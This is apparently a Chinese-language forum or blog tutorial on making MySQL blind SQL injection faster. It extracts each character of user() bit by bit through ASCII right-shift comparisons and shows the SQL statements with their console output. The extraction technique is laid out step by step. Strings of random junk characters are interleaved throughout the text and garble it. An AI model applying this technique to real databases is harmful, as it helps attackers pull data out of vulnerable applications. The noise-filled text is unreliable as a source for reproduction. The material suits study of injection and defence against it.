关于通过对8bit的ascii做右位移提高mysql盲注效率

admin

通过这种方法我们只需要做8次select来确定一个键值的第一位或第n位
# w2 A3 b3 b: U9 E

6 F% d+ i: Z3 E( R, h, ?0 \
下面将以查询mysql数据库当中user()的第一位为例:


1 _2 }/ s% d. w7 S
. Z* {4 O/ Z* P5 t8 S+ Gps:第二位,第三位依次类推 select substr(user(),2,1) mysql> select substr(user(),3,1)

- p' N* B+ x' c1 T

首先执行如下sql语句:

! ]" J: j+ M1 _4 g' ~% R3 A) j; K4 W; i
! ~. W0 J# \! d- c2 `
: f& O6 \, C6 t2 ]: e$ amysql> select (ascii((substr(user(),1,1))) >> 7)=0;
) A. \& _' a, x


  U" t- K. M, \: |我们将对这个8bit的ascii也就是user()的第一位做7次右偏移,也就是偏移到8bit的ascii的

8 K. ^8 @; ~9 I) @1 m/ ]

! `- h& A) \: h2 J. ^3 I2 X6 _第一位并与0做等运算,如果,运算结果为0 说明第一位不为0,也就为1
4 W3 ]8 V* s8 X' j) G8 f. D

3 O/ \) d7 h5 A! m/ \* T
如果运算结果为1,说明第一位为0,不为1
( w& u+ ?' Q2 J5 U
& u( w4 {! X. a! D! M/ k. G8 l- c
& _5 e# y7 v6 s8 `7 s3 g0 Q8 U
) I9 K7 L; s: {; ~8 t$ u+————————————–+

| (ascii((substr(user(),1,1))) >> 7)=0 |

8 }+ ^. @* r1 r( Q' Y. {+————————————–+

| 1 |
6 n# k. N5 l+ [7 c, H# ~
+————————————–+

1 row in set (0.00 sec)
- |4 n" @( e! n, z/ i5 E
, k6 a, q& q5 e1 I; d这样我们就确定这个8bit的ascii的第一位为0
! K* Z" V5 y  P7 T' K, \+ h2 s

. p5 \4 x: R7 N
; N  D' |6 H; e9 c第二次我们来做6次右偏移来确定前两位


7 z( ]' F" P. p# g; |
前两位可能是01或00,即依然可以与0做比较,
  U: R# v% ]7 ^$ l
& l8 C& r. {" n! i/ gmysql> select (ascii((substr(user(),1,1))) >> 6)=0;
1 K; C1 J- E6 i  ]
+————————————–+
7 W0 l6 u& r+ T) P* H  _& k
" A1 `( O) v8 y. L| (ascii((substr(user(),1,1))) >> 6)=0 |
$ }5 I. z5 C5 n# Y. I
+————————————–+

6 L* |0 f8 S5 i1 y' p' d6 ]| 0 |

+————————————–+
1 Y0 s; O1 V" z; V
1 row in set (0.00 sec)
. U  d+ C7 Q1 B' R. z' f
$ Y2 W6 g' R1 M$ o8 w$ S
* u6 U# ^6 n% h, K# d# |
结果为0,即第二位为1
3 E0 x. P, n4 C0 m. w1 S7 `+ c) n


开始猜测前三位为010或011
' C/ Q, V+ y2 I2 ~& |% T' p0 W9 P


# z$ D' A; c& b0 v让我们看看010和011的ascii码是多少
' P& Z' f! E8 c0 f9 U
8 \  \( n- `/ W
9 a# e1 [6 e+ W) B5 H& b
7 ?; T' n  ]% j0 U分别查询select b’011′ select b’010′

' M* [. \( n# @& X- C6 u! X

获得结果 010 = 2 011 = 3

* V8 z- C7 E/ {: s/ n0 T

. Q* J9 ]6 A) m, r+ `, X执行如下sql:


! r" A$ r8 d) z. [
mysql> select (ascii((substr(user(),1,1))) >> 5)=2;
7 ?0 w6 \: L# m$ S
+————————————–+

| (ascii((substr(user(),1,1))) >> 5)=2 |
) r3 F9 a0 v& d
0 r; G/ e- O' {! D$ y+————————————–+

| 0 |
/ g- A) ?$ r5 o6 x( C
2 I6 t6 i& j6 k$ u+————————————–+

即前三位不为010,而是011
3 |5 i0 D& v: ]* ^5 q

$ z  d! w  z2 f
9 F2 m. |' `) |4 I: \直到获得最后一位
3 C4 F$ F( M: C! _$ ^1 t
! |9 ~  ]; L( ?+ p

最终结果为:01110010
7 O0 l; ?7 w; k5 g2 S8 T  E6 K

: w: N, i6 Z! g
转换一下:


5 X/ J1 x0 d, z+ I
select b’01110010′


& x3 m3 M, J7 A9 R, V0 n+ ?
1 S) u9 F4 z' d2 Q6 s1 D9 v+ Q+ S9 Z查询结果
9 ]- v! [3 u8 s' \  @! \
, Q7 J4 U. l% r+ r9 d+ i5 {6 ]3 w
; F' F2 r) x1 J% z- e8 y
% H  y1 A8 i) Z; ]+————-+
% w# W; z. [$ Q( [1 P% s3 j5 {/ O
| b’01110010′ |
% `4 j' M# f; ]- h' H( j
+ o1 i8 n1 a1 I! l+————-+
* c! O( z3 ~' b, C& s' {
2 R* P6 A2 j) f$ n7 W' R8 G| r |

: E, w9 o+ C* H! c- H& I+————-+

2 H& p/ c# j% _2 P9 f; r1 row in set (0.00 sec)

8 b0 i* K% q+ C, [, \0 D5 t

/ j- V% t0 W( r8 P/ _这样我们就获得了user()的第一位.其它位依此类推
5 y+ y* ?$ X# g% ^; m/ K9 J
) f% {- Q- H2 E* N# G' y5 f2 N4 }